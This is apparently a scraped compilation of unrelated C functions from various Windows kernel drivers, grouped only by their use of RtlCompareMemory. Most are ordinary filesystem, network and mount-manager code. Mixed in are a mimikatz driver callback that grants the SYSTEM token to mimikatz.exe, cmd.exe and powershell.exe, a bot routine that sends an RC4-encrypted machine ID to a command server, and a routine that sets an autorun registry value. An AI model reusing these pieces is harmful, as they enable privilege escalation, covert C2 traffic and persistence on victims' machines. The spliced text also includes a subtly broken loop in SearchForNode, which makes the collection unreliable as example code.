enum ArpCacheEntrySearchResult SearchForNode(struct ARP_HEADER * arph) { struct ARP_CACHE_NODE * tn = ArpCache; if(tn == NULL){ return ACESR_NotFound; } while(tn != NULL){ if(sizeof(struct ARP_HEADER) == RtlCompareMemory(arph, tn->arph, sizeof(struct ARP_HEADER))){ /*note: use RtlCompareMemory only if arph, and tn->arph are both resident. */ return ACESR_Found; } if((sizeof arph->SourceMACAddress) == RtlCompareMemory(arph->SourceMACAddress, tn->arph.SourceMACAddress, sizeof arph->SourceMACAddress)){ return ACESR_FoundMAC; } if((sizeof arph->SourceIPAddress) == RtlCompareMemory(arph->SourceIPAddress, tn->arph.SourceIPAddress, sizeof arph->SourceIPAddress)){ return ACESR_FoundIP; } } return ACESR_NotFound; }
BOOLEAN TapeVerifyInquiry( IN PSCSI_INQUIRY_DATA LunInfo ) /*++ Routine Description: This routine determines if the driver should claim this device. Arguments: LunInfo Return Value: TRUE - driver should claim this device. FALSE - driver should not claim this device. --*/ { PINQUIRYDATA inquiryData; DebugPrint((3,"TapeVerifyInquiry: Verify Tape Inquiry Data\n")); inquiryData = (PVOID)LunInfo->InquiryData; return ((RtlCompareMemory(inquiryData->VendorId,"OVERLAND",8) == 8) && ((RtlCompareMemory(inquiryData->ProductId,"_5212/5214",10) == 10) || (RtlCompareMemory(inquiryData->ProductId,"_5612/5614",10) == 10))); } // end TapeVerifyInquiry()
NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg) { NTSTATUS status = STATUS_SUCCESS; PCHAR processName = PsGetProcessImageFileName(pProcess); if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) || (RtlCompareMemory("cmd.exe", processName, 7) == 7) || (RtlCompareMemory("powershell.exe", processName, 14) == 14)) status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, (HANDLE) pvArg, pProcess); return status; }
VOID WAN_RemoveRasLink ( IN PKIP_NDIS_ADAPTER pAdapter, IN PNDIS_WAN_LINE_DOWN pWanLineDown ) { PKIP_RAS_LINK RasLink = NULL; PLIST_ENTRY ListEntry; DBGLOG(( LTrace, "Local MAC: %.2X%.2X%.2X%.2X%.2X%.2X Remote MAC: %.2X%.2X%.2X%.2X%.2X%.2X\n", pWanLineDown->LocalAddress[0], pWanLineDown->LocalAddress[1], pWanLineDown->LocalAddress[2], pWanLineDown->LocalAddress[3], pWanLineDown->LocalAddress[4], pWanLineDown->LocalAddress[5], pWanLineDown->RemoteAddress[0], pWanLineDown->RemoteAddress[1], pWanLineDown->RemoteAddress[2], pWanLineDown->RemoteAddress[3], pWanLineDown->RemoteAddress[4], pWanLineDown->RemoteAddress[5] )); KIP_LOCK_ADAPTER(pAdapter); for( ListEntry = pAdapter->RasLinkList.Flink; ListEntry != &pAdapter->RasLinkList; ListEntry = ListEntry->Flink ) { RasLink = CONTAINING_RECORD(ListEntry,KIP_RAS_LINK,Interface.Link); if ( (RtlCompareMemory(RasLink->RemoteAddress, pWanLineDown->RemoteAddress, ETHARP_HWADDR_LEN) == ETHARP_HWADDR_LEN ) && (RtlCompareMemory(RasLink->Interface.CurrentMacAddress, pWanLineDown->LocalAddress, ETHARP_HWADDR_LEN) == ETHARP_HWADDR_LEN ) ) { RemoveEntryList (&RasLink->Interface.Link); break; } RasLink = NULL; } KIP_UNLOCK_ADAPTER(pAdapter); if ( RasLink ){ // update arp table etharp_remove_static_entry( &RasLink->IpAddr ); etharp_remove_static_entry( &RasLink->RemoteIpAddr ); ProtocolUnBindAdapter( RasLink->Interface.Miniport, &RasLink->Interface, &RasLink->Interface.Protocol ); NdisFreeMemory ( RasLink, sizeof (KIP_RAS_LINK), 0 ); } }
/* * @implemented */ VOID UpdateReplicatedUniqueIds(IN PDEVICE_INFORMATION DeviceInformation, IN PDATABASE_ENTRY DatabaseEntry) { PLIST_ENTRY NextEntry; PUNIQUE_ID_REPLICATE ReplicatedUniqueId, NewEntry; /* Browse all the device replicated unique IDs */ for (NextEntry = DeviceInformation->ReplicatedUniqueIdsListHead.Flink; NextEntry != &(DeviceInformation->ReplicatedUniqueIdsListHead); NextEntry = NextEntry->Flink) { ReplicatedUniqueId = CONTAINING_RECORD(NextEntry, UNIQUE_ID_REPLICATE, ReplicatedUniqueIdsListEntry); if (ReplicatedUniqueId->UniqueId->UniqueIdLength != DatabaseEntry->UniqueIdLength) { continue; } /* If we find the UniqueId to update, break */ if (RtlCompareMemory(ReplicatedUniqueId->UniqueId->UniqueId, (PVOID)((ULONG_PTR)DatabaseEntry + DatabaseEntry->UniqueIdOffset), ReplicatedUniqueId->UniqueId->UniqueIdLength) == ReplicatedUniqueId->UniqueId->UniqueIdLength) { break; } } /* We found the unique ID, no need to continue */ if (NextEntry != &(DeviceInformation->ReplicatedUniqueIdsListHead)) { return; } /* Allocate a new entry for unique ID */ NewEntry = AllocatePool(sizeof(UNIQUE_ID_REPLICATE)); if (!NewEntry) { return; } /* Allocate the unique ID */ NewEntry->UniqueId = AllocatePool(DatabaseEntry->UniqueIdLength + sizeof(MOUNTDEV_UNIQUE_ID)); if (!NewEntry->UniqueId) { FreePool(NewEntry); return; } /* Copy */ NewEntry->UniqueId->UniqueIdLength = DatabaseEntry->UniqueIdLength; RtlCopyMemory(NewEntry->UniqueId->UniqueId, (PVOID)((ULONG_PTR)DatabaseEntry + DatabaseEntry->UniqueIdOffset), DatabaseEntry->UniqueIdLength); /* And insert into replicated unique IDs list */ InsertTailList(&DeviceInformation->ReplicatedUniqueIdsListHead, &NewEntry->ReplicatedUniqueIdsListEntry); return; }
/* * @implemented */ NTSTATUS NTAPI ChangeUniqueIdRoutine(IN PWSTR ValueName, IN ULONG ValueType, IN PVOID ValueData, IN ULONG ValueLength, IN PVOID Context, IN PVOID EntryContext) { PMOUNTDEV_UNIQUE_ID OldUniqueId = Context; PMOUNTDEV_UNIQUE_ID NewUniqueId = EntryContext; /* Validate parameters not to corrupt registry */ if ((ValueType != REG_BINARY) || (OldUniqueId->UniqueIdLength != ValueLength)) { return STATUS_SUCCESS; } if (RtlCompareMemory(OldUniqueId->UniqueId, ValueData, ValueLength) == ValueLength) { /* Write new data */ RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE, DatabasePath, ValueName, REG_BINARY, NewUniqueId, NewUniqueId->UniqueIdLength); } return STATUS_SUCCESS; }
/* * @implemented */ NTSTATUS NTAPI CheckForNoDriveLetterEntry(IN PWSTR ValueName, IN ULONG ValueType, IN PVOID ValueData, IN ULONG ValueLength, IN PVOID Context, IN PVOID EntryContext) { PBOOLEAN EntryPresent = EntryContext; PMOUNTDEV_UNIQUE_ID UniqueId = Context; /* Check if matches no drive letter entry */ if (ValueName[0] != L'#' || ValueType != REG_BINARY || UniqueId->UniqueIdLength != ValueLength) { return STATUS_SUCCESS; } /* Compare unique ID */ if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) == ValueLength) { *EntryPresent = TRUE; } return STATUS_SUCCESS; }
FSRTL_COMPARISON_RESULT NTAPI FatiCompareNames(PSTRING NameA, PSTRING NameB) { ULONG MinimumLen, i; /* Calc the minimum length */ MinimumLen = NameA->Length < NameB->Length ? NameA->Length : NameB->Length; /* Actually compare them */ i = (ULONG)RtlCompareMemory( NameA->Buffer, NameB->Buffer, MinimumLen ); if (i < MinimumLen) { /* Compare prefixes */ if (NameA->Buffer[i] < NameB->Buffer[i]) return LessThan; else return GreaterThan; } /* Final comparison */ if (NameA->Length < NameB->Length) return LessThan; else if (NameA->Length > NameB->Length) return GreaterThan; else return EqualTo; }
VOID OnProcessQuit(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create) { if(Create == TRUE) { PEPROCESS p=PsGetCurrentProcess(); ANSI_STRING ascallCode; RtlInitAnsiString(&ascallCode,(char *)p+g_processNameOffset); UNICODE_STRING uni; RtlAnsiStringToUnicodeString(&uni,&ascallCode,true); _wcslwr(uni.Buffer); if(RtlCompareMemory(BEGINOPERATEREG,uni.Buffer,uni.Length)) { if(SetReg(AUTORUN,REGNAME) == false) WriteSysLog(LOG_TYPE_DEBUG,L" is userinital create reg : %s","error"); } RtlFreeUnicodeString(&uni); return; } kdP(("OnProcessQuit \n")); if(IsProcessProtected((ULONG)ProcessId)) RemoveProtectPID((ULONG)ProcessId); }
bool IsHashSecure(const unsigned char* hash) { KeWaitForSingleObject(&g_secuHashMutex,Executive,KernelMode,FALSE,NULL); UCHAR id = HashFunc(hash); bool bReturn = false; //SECURE_HASH* secuHash = g_secuHash[id]; SECURE_HASH* secuHash = g_queryHash[id]; unsigned __int64 uiStartTimer = __rdtsc(); while(secuHash) { if(RtlCompareMemory(secuHash->Hash, hash, HASH_SIZE) == HASH_SIZE) { bReturn = true; break; } if( ((__rdtsc() - uiStartTimer) / (1000 * 1000 * 1000)) >= MAXELPASETIMERFORCHECK ) { WriteSysLog(LOG_TYPE_INFO,L"elapse the large timer 6 seconds\n "); bReturn = false; break; } secuHash = secuHash->next; } releaseMutex(); return true == bReturn? true:false; }
BOOL WAN_CheckForContext ( IN PKIP_NDIS_ADAPTER pAdapter, IN PCHAR pProtoContext ) { PLIST_ENTRY ListEntry; PKIP_RAS_LINK pRasLink; BOOLEAN fbResult = FALSE; DBGLOG(( LTrace, "Context: %.2X%.2X%.2X%.2X\n", pProtoContext[0], pProtoContext[1], pProtoContext[2], pProtoContext[3] )); KIP_LOCK_ADAPTER(pAdapter); for ( ListEntry = pAdapter->RasLinkList.Flink; ListEntry != &pAdapter->RasLinkList; ListEntry = ListEntry->Flink) { pRasLink = CONTAINING_RECORD(ListEntry,KIP_RAS_LINK,Interface.Link); if ( (RtlCompareMemory(&pRasLink->Interface.CurrentMacAddress[2], pProtoContext, 4) == 4) ){ fbResult = TRUE; break; } } KIP_UNLOCK_ADAPTER(pAdapter); return fbResult; }
BOOLEAN HtpCompareKeys ( _In_ PBL_HASH_ENTRY Entry1, _In_ PBL_HASH_ENTRY Entry2 ) { ULONG Flags; BOOLEAN ValueMatch; /* Check if the flags or sizes are not matching */ Flags = Entry1->Flags; if ((Entry1->Size != Entry2->Size) || (Flags != Entry2->Flags)) { ValueMatch = FALSE; } else if (Flags & BL_HT_VALUE_IS_INLINE) { /* Check if this is an in-line value, compare it */ ValueMatch = Entry1->Value == Entry2->Value; } else { /* This is a pointer value, compare it */ ValueMatch = (RtlCompareMemory(Entry1->Value, Entry2->Value, Entry1->Size) == Entry1->Size); } /* Return if it matched */ return ValueMatch; }
/* * @implemented */ NTSTATUS NTAPI SymbolicLinkNamesFromUniqueIdCount(IN PWSTR ValueName, IN ULONG ValueType, IN PVOID ValueData, IN ULONG ValueLength, IN PVOID Context, IN PVOID EntryContext) { UNICODE_STRING ValueNameString; PMOUNTDEV_UNIQUE_ID UniqueId = Context; if (ValueName[0] != L'#' || ValueType != REG_BINARY || (UniqueId->UniqueIdLength != ValueLength)) { return STATUS_SUCCESS; } if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) != ValueLength) { return STATUS_SUCCESS; } /* That one matched, increase count */ RtlInitUnicodeString(&ValueNameString, ValueName); if (ValueNameString.Length) { (*((PULONG)EntryContext))++; } return STATUS_SUCCESS; }
VOID DraidListnerDelAddress( PTDI_ADDRESS_LPX Addr ) { PDRAID_GLOBALS DraidGlobals; PLIST_ENTRY listEntry; KIRQL oldIrql; PDRAID_LISTEN_CONTEXT ListenContext; if (!g_DraidGlobals) { KDPrintM(DBG_LURN_INFO, ("DRAID is not running\n")); return; } DraidGlobals = g_DraidGlobals; // Find matching address and just mark active flag false because Wait event may be in use. ACQUIRE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, &oldIrql); for (listEntry = DraidGlobals->ListenContextList.Flink; listEntry != &DraidGlobals->ListenContextList; listEntry = listEntry->Flink) { ListenContext = CONTAINING_RECORD (listEntry, DRAID_LISTEN_CONTEXT, Link); if (RtlCompareMemory(ListenContext->Addr.Node, Addr->Node, 6) == 6) { KDPrintM(DBG_LURN_INFO, ("Found matching address\n")); ListenContext->Destroy = TRUE; KeSetEvent(&DraidGlobals->NetChangedEvent, IO_NO_INCREMENT, FALSE); break; } } RELEASE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, oldIrql); }
void TestFsRtlAddToTunnelCache(ULONGLONG DirectoryKey, PUNICODE_STRING s_name, PUNICODE_STRING l_name, BOOLEAN KeyByShortName) { SIZE_T eq; LONG b; PUNICODE_STRING bs_name; PUNICODE_STRING bl_name; PVOID Bufb; PVOID Buf; Buf = ExAllocatePool(PagedPool, BufSize); ok(Buf != NULL, "Buff in TestFsRtlAddToTunnelCache is NULL after allocated memory\n"); Bufb = ExAllocatePool(PagedPool, BufSize); ok(Bufb != NULL, "Buff in TestFsRtlAddToTunnelCache is NULL after allocated memory\n"); // Allocate memory for the bufs_name bs_name = CopyUS(s_name); // Allocate memory for the l_name and bl_name bl_name = CopyUS(l_name); memset((void*)Buf, 0, BufSize); memset((void*)Bufb, 0, BufSize); FsRtlAddToTunnelCache(T, DirectoryKey, s_name, l_name, KeyByShortName, BufSize, Buf); eq = RtlCompareMemory((const VOID*)Buf, (const VOID*)Bufb, BufSize); ok( eq != sizeof(TUNNEL),"FsRtlAddToTunnelCache function did not change anything in the memory at the address Buf.\n"); b = RtlCompareUnicodeString(l_name, bl_name, TRUE); ok (b == 0, "long name after call FsRtlAddToTunnelCache != long name befo call FsRtlAddToTunnelCache\n\n"); b = RtlCompareUnicodeString(s_name, bs_name, TRUE); ok (b == 0, "short name after call FsRtlAddToTunnelCache != short name befo call FsRtlAddToTunnelCache\n\n"); }
PDRAID_LISTEN_CONTEXT DraidCreateListenContext( PDRAID_GLOBALS DraidGlobals, PLPX_ADDRESS Addr ) { KIRQL oldIrql; BOOLEAN AlreadyExist; PLIST_ENTRY listEntry; PDRAID_LISTEN_CONTEXT ListenContext; // // Check address is already in the listen context list // ACQUIRE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, &oldIrql); AlreadyExist = FALSE; for (listEntry = DraidGlobals->ListenContextList.Flink; listEntry != &DraidGlobals->ListenContextList; listEntry = listEntry->Flink) { ListenContext = CONTAINING_RECORD (listEntry, DRAID_LISTEN_CONTEXT, Link); if (!ListenContext->Destroy && RtlCompareMemory(ListenContext->Addr.Node, Addr->Node, 6) == 6) { KDPrintM(DBG_LURN_INFO, ("New LPX address already exist.Ignoring.\n")); AlreadyExist = TRUE; break; } } RELEASE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, oldIrql); if (AlreadyExist) { return NULL; } // // Alloc listen context // ListenContext = ExAllocatePoolWithTag(NonPagedPool, sizeof(DRAID_LISTEN_CONTEXT), DRAID_LISTEN_CONTEXT_POOL_TAG); if (!ListenContext) { KDPrintM(DBG_LURN_INFO, ("Failed to alloc listen context\n")); return NULL; } RtlZeroMemory(ListenContext, sizeof(DRAID_LISTEN_CONTEXT)); KeInitializeEvent( &ListenContext->TdiListenContext.CompletionEvent, NotificationEvent, FALSE ); InitializeListHead(&ListenContext->Link); RtlCopyMemory(ListenContext->Addr.Node, Addr->Node, 6); ListenContext->Addr.Port = HTONS(DRIX_ARBITER_PORT_NUM_BASE); ExInterlockedInsertTailList(&DraidGlobals->ListenContextList, &ListenContext->Link, &DraidGlobals->ListenContextSpinlock ); return ListenContext; }
// // compare addresses to see if the address is local. // BOOLEAN LfsIsFromLocal( PLPX_ADDRESS Addr ) { NTSTATUS ntStatus; SOCKETLPX_ADDRESS_LIST socketLpxAddressList; LONG idx_addr ; SPY_LOG_PRINT( LFS_DEBUG_TABLE_NOISE, ( "[LFS] LfsIsFromLocal: Entered with Addr:%02x:%02x:%02x:%02x:%02x:%02x\n", Addr->Node[0], Addr->Node[1], Addr->Node[2], Addr->Node[3], Addr->Node[4], Addr->Node[5] )); // // get addresses from LPX // socketLpxAddressList.iAddressCount = 0 ; ntStatus = LpxTdiV2GetAddressList( &socketLpxAddressList ) ; if(!NT_SUCCESS(ntStatus)) { SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: LpxTdiV2GetAddressList() failed.\n")) ; return FALSE ; } if(0 == socketLpxAddressList.iAddressCount) { SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: No NICs in the host.\n")) ; return FALSE ; } for(idx_addr = 0 ; idx_addr < socketLpxAddressList.iAddressCount ; idx_addr ++ ) { // // BUG FIX for LPX: skip SocketLpxDevice // if( (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[0]) && (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[1]) && (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[2]) && (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[3]) && (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[4]) && (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[5]) ) { SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: We don't use SocketLpx device.\n") ); continue ; } if( RtlCompareMemory(Addr->Node, socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node, ETHER_ADDR_LENGTH) == ETHER_ADDR_LENGTH ) { SPY_LOG_PRINT( LFS_DEBUG_TABLE_NOISE, ( "[LFS] LfsIsFromLocal: found a address matching.\n")) ; return TRUE ; } } return FALSE ; }
INT MyRtlCompareMemory( IN CONST VOID *Source1, IN CONST VOID *Source2, IN SIZE_T Length ) { return (INT)RtlCompareMemory(Source1, Source2, Length); }
PCHAR Server::SendRequest(PCHAR ServerUrl, DWORD Type, PCHAR Request, DWORD RequestLen, BOOLEAN Wait, PDWORD Size, PBOOLEAN pbok) { PVOID Result = NULL; WINET_LOADURL LoadUrl = {0}; PCHAR BotId = Drop::GetMachineGuid(); CHAR chHost[MAX_PATH] = {0}; DWORD dwHost = RTL_NUMBER_OF(chHost)-1; PCHAR FullRequest; *pbok = FALSE; if (FullRequest = (PCHAR)malloc(RequestLen + 100)) { DWORD Len = sprintf(FullRequest, "%s|%d|", Drop::GetMachineGuid(), Type); CopyMemory(FullRequest + Len, Request, RequestLen); Len += RequestLen; LoadUrl.pcMethod = "POST"; LoadUrl.pcUrl = ServerUrl; if (SUCCEEDED(UrlGetPart(ServerUrl, chHost, &dwHost, URL_PART_HOSTNAME, 0))) { LoadUrl.dwPstData = Len; if (LoadUrl.pvPstData = Utils::UtiCryptRc4M(chHost, dwHost, FullRequest, Len)) { LoadUrl.dwRetry = Config::ReadInt(CFG_DCT_MAIN_SECTION, CFG_DCT_MAIN_SRVRETRY); PVOID Buffer = Wait ? WinetLoadUrlWait(&LoadUrl, 2*60) : WinetLoadUrl(&LoadUrl); if (Buffer) { Utils::UtiCryptRc4(BotId, lstrlen(BotId), Buffer, Buffer, LoadUrl.dwBuffer); if ((RtlCompareMemory(Buffer, "OK\r\n", 4) == 4)) { *pbok = TRUE; if (LoadUrl.dwBuffer > 4) { if (Result = malloc(LoadUrl.dwBuffer - 3)) { CopyMemory(Result, (PCHAR)Buffer + 4, LoadUrl.dwBuffer - 4); ((PCHAR)Result)[LoadUrl.dwBuffer - 4] = 0; if (Size) *Size = LoadUrl.dwBuffer - 4; } } } free(Buffer); } free(LoadUrl.pvPstData); } } free(FullRequest); } return (PCHAR)Result; }
static BOOLEAN LfsTable_Lookup( IN PLFS_TABLE LfsTable, IN PNETDISK_PARTITION_INFO NetDiskPartitionInfo, OUT PLFSTAB_ENTRY *LfsTabEntry ) { PLIST_ENTRY listEntry ; KIRQL oldIrql ; PLFSTAB_ENTRY entry ; BOOLEAN Found ; Found = FALSE ; ExAcquireSpinLock(&LfsTable->SpinLock, &oldIrql) ; listEntry = LfsTable->LfsTabPartitionList.Flink ; while(listEntry != &LfsTable->LfsTabPartitionList) { entry = CONTAINING_RECORD(listEntry, LFSTAB_ENTRY, LfsTabPartitionEntry) ; if( RtlCompareMemory( // NetDisk Address &entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress, &NetDiskPartitionInfo->NetDiskAddress, sizeof(LPX_ADDRESS)) == sizeof(LPX_ADDRESS) && entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo == NetDiskPartitionInfo->UnitDiskNo // UnitDisk No && entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.StartingOffset.QuadPart == NetDiskPartitionInfo->StartingOffset.QuadPart // Partition Starting Byte Offset ) { LfsTable_ReferenceEntry ( entry ) ; *LfsTabEntry = entry ; Found = TRUE ; break ; } listEntry = listEntry->Flink ; } ExReleaseSpinLock(&LfsTable->SpinLock, oldIrql) ; #if DBG if(!Found) { SPY_LOG_PRINT( LFS_DEBUG_TABLE_INFO, ("LFS: LfsTable_Lookup: updated the primary address of NetDisk:%02x:%02x:%02x:%02x:%02x:%02x/%d UnitDisk:%d\n", NetDiskPartitionInfo->NetDiskAddress.Node[0], NetDiskPartitionInfo->NetDiskAddress.Node[1], NetDiskPartitionInfo->NetDiskAddress.Node[2], NetDiskPartitionInfo->NetDiskAddress.Node[3], NetDiskPartitionInfo->NetDiskAddress.Node[4], NetDiskPartitionInfo->NetDiskAddress.Node[5], NTOHS(NetDiskPartitionInfo->NetDiskAddress.Port), (int)NetDiskPartitionInfo->UnitDiskNo )); } #endif return Found ; }
/* * @implemented */ NTSTATUS NTAPI SymbolicLinkNamesFromUniqueIdQuery(IN PWSTR ValueName, IN ULONG ValueType, IN PVOID ValueData, IN ULONG ValueLength, IN PVOID Context, IN PVOID EntryContext) { UNICODE_STRING ValueNameString; PMOUNTDEV_UNIQUE_ID UniqueId = Context; /* Unicode strings table */ PUNICODE_STRING ReturnString = EntryContext; if (ValueName[0] != L'#' || ValueType != REG_BINARY || (UniqueId->UniqueIdLength != ValueLength)) { return STATUS_SUCCESS; } if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) != ValueLength) { return STATUS_SUCCESS; } /* Unique ID matches, let's put the symlink */ RtlInitUnicodeString(&ValueNameString, ValueName); if (!ValueNameString.Length) { return STATUS_SUCCESS; } /* Allocate string to copy */ ValueNameString.Buffer = AllocatePool(ValueNameString.MaximumLength); if (!ValueNameString.Buffer) { return STATUS_SUCCESS; } /* Copy */ RtlCopyMemory(ValueNameString.Buffer, ValueName, ValueNameString.Length); ValueNameString.Buffer[ValueNameString.Length / sizeof(WCHAR)] = UNICODE_NULL; while (ReturnString->Length) { ReturnString++; } /* And return that string */ *ReturnString = ValueNameString; return STATUS_SUCCESS; }
static NTSTATUS VfatVerify (PVFAT_IRP_CONTEXT IrpContext) /* * FUNCTION: Verify the filesystem */ { PDEVICE_OBJECT DeviceToVerify; NTSTATUS Status = STATUS_SUCCESS; FATINFO FatInfo; BOOLEAN RecognizedFS; PDEVICE_EXTENSION DeviceExt = IrpContext->DeviceExt; DPRINT("VfatVerify(IrpContext %p)\n", IrpContext); DeviceToVerify = IrpContext->Stack->Parameters.VerifyVolume.DeviceObject; Status = VfatBlockDeviceIoControl(DeviceToVerify, IOCTL_DISK_CHECK_VERIFY, NULL, 0, NULL, 0, TRUE); DeviceToVerify->Flags &= ~DO_VERIFY_VOLUME; if (!NT_SUCCESS(Status) && Status != STATUS_VERIFY_REQUIRED) { DPRINT("VfatBlockDeviceIoControl() failed (Status %lx)\n", Status); Status = STATUS_WRONG_VOLUME; } else { Status = VfatHasFileSystem(DeviceToVerify, &RecognizedFS, &FatInfo); if (!NT_SUCCESS(Status) || RecognizedFS == FALSE) { Status = STATUS_WRONG_VOLUME; } else if (sizeof(FATINFO) == RtlCompareMemory(&FatInfo, &DeviceExt->FatInfo, sizeof(FATINFO))) { /* * FIXME: * Preformated floppy disks have very often a serial number of 0000:0000. * We should calculate a crc sum over the sectors from the root directory as secondary volume number. * Each write to the root directory must update this crc sum. */ } else { Status = STATUS_WRONG_VOLUME; } } return Status; }
VOID LfsTable_UpdatePrimaryInfo( IN PLFS_TABLE LfsTable, IN PLPX_ADDRESS NetDiskAddress, IN UCHAR UnitDiskNo, IN PLPX_ADDRESS PrimaryAddress ) { PLIST_ENTRY listEntry ; KIRQL oldIrql ; KIRQL oldIrql2 ; PLFSTAB_ENTRY entry ; ExAcquireSpinLock(&LfsTable->SpinLock, &oldIrql) ; listEntry = LfsTable->LfsTabPartitionList.Flink ; while(listEntry != &LfsTable->LfsTabPartitionList) { entry = CONTAINING_RECORD(listEntry, LFSTAB_ENTRY, LfsTabPartitionEntry) ; if( RtlCompareMemory( // NetDisk Address &entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node, NetDiskAddress->Node, LPXADDR_NODE_LENGTH) == LPXADDR_NODE_LENGTH && entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Port == NetDiskAddress->Port && entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo == UnitDiskNo // UnitDisk No ) { ExAcquireSpinLock(&entry->SpinLock, &oldIrql2) ; RtlCopyMemory(&entry->PrimaryAddress, PrimaryAddress, sizeof(LPX_ADDRESS)) ; entry->Flags |= LFSTABENTRY_FLAG_VAILDPRIMADDRESS; ExReleaseSpinLock(&entry->SpinLock, oldIrql2) ; SPY_LOG_PRINT( LFS_DEBUG_TABLE_INFO, ("LFS: LfsTable_UpdatePrimaryInfo: updated the primary address of NetDisk:%02x:%02x:%02x:%02x:%02x:%02x/%d UnitDisk:%d\n", entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[0], entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[1], entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[2], entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[3], entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[4], entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[5], NTOHS(entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Port), (int)entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo )); } listEntry = listEntry->Flink ; } ExReleaseSpinLock(&LfsTable->SpinLock, oldIrql) ; }
NTSTATUS pnp_removal(PVOID NotificationStructure, PVOID Context) { #endif TARGET_DEVICE_REMOVAL_NOTIFICATION* tdrn = (TARGET_DEVICE_REMOVAL_NOTIFICATION*)NotificationStructure; pdo_device_extension* pdode = (pdo_device_extension*)Context; if (RtlCompareMemory(&tdrn->Event, &GUID_TARGET_DEVICE_QUERY_REMOVE, sizeof(GUID)) == sizeof(GUID)) { TRACE("GUID_TARGET_DEVICE_QUERY_REMOVE\n"); if (pdode->vde && pdode->vde->mounted_device) return pnp_query_remove_device(pdode->vde->mounted_device, NULL); } return STATUS_SUCCESS; }
static VOID PrimaryAgentNICDisabled( PPRIMARY Primary, PSOCKETLPX_ADDRESS_LIST AddressList ) { LONG idx_listen; LONG idx_disabled; BOOLEAN found; for(idx_disabled = 0; idx_disabled < AddressList->iAddressCount; idx_disabled ++ ) { found = FALSE; for(idx_listen = 0; idx_listen < MAX_SOCKETLPX_INTERFACE; idx_listen ++) { // // find the match // if(Primary->Agent.ListenSocket[idx_listen].Active && RtlCompareMemory( AddressList->SocketLpx[idx_disabled].LpxAddress.Node, Primary->Agent.ListenSocket[idx_listen].NICAddress.Node, ETHER_ADDR_LENGTH ) == ETHER_ADDR_LENGTH ) { found = TRUE; break; } } // // delete disabled one if found. // if(found) { PPRIMARY_LISTEN_SOCKET listenSock = Primary->Agent.ListenSocket + idx_listen; listenSock->Active = FALSE; LpxTdiDisassociateAddress(listenSock->ListenFileObject); LpxTdiCloseConnection(listenSock->ListenFileHandle, listenSock->ListenFileObject); LpxTdiCloseAddress (listenSock->AddressFileHandle, listenSock->AddressFileObject); Primary->Agent.ActiveListenSocketCount --; SPY_LOG_PRINT( LFS_DEBUG_PRIMARY_INFO, ("PrimaryAgentNICEnabled: A NIC deleted..\n")); } } }
NTSTATUS RemoveMatchExpression(__in WCHAR Expression[], __in ULONG ExpressionLength) { // 这里要先判断链表是否为空 if (IsListEmpty(&MatchExpressionList.HeadList)) { KdPrint(("[ISISandBox] RemoveMatchExpression -> List is empty.\n")); return STATUS_SUCCESS; } KdPrint(("[ISISandBox] RemoveMatchExpression -> Get spinlock.\n")); KIRQL irql; KeAcquireSpinLock(&MatchExpressionList.Lock, &irql); // 链表头 PLIST_ENTRY pList = MatchExpressionList.HeadList.Flink; BOOLEAN isFind = FALSE; while (pList != &MatchExpressionList.HeadList) { PMATCH_EXPRESSION element = CONTAINING_RECORD(pList, MATCH_EXPRESSION, ListEntry); if (RtlCompareMemory(element->Expression, Expression, ExpressionLength) == ExpressionLength) { pList->Blink->Flink = pList->Flink; pList->Flink->Blink = pList->Blink; pList = pList->Flink; // 这里的指针都已经断开了,即链表中不存在element了,现在只需要将其内存释放就OK了 ExFreeToPagedLookasideList(&MatchExpressionList.PageList, element); KdPrint(("[ISISandBox] RemoveMatchExpression Delete expression | Expression : %S.\n", Expression)); isFind = TRUE; break; } pList = pList->Flink; } KeReleaseSpinLock(&MatchExpressionList.Lock, irql); if (isFind) return STATUS_SUCCESS; else { KdPrint(("[ISISandBox] RemoveMatchExpression Cannot find expression : %S.\n", Expression)); return STATUS_NOT_FOUND; } }
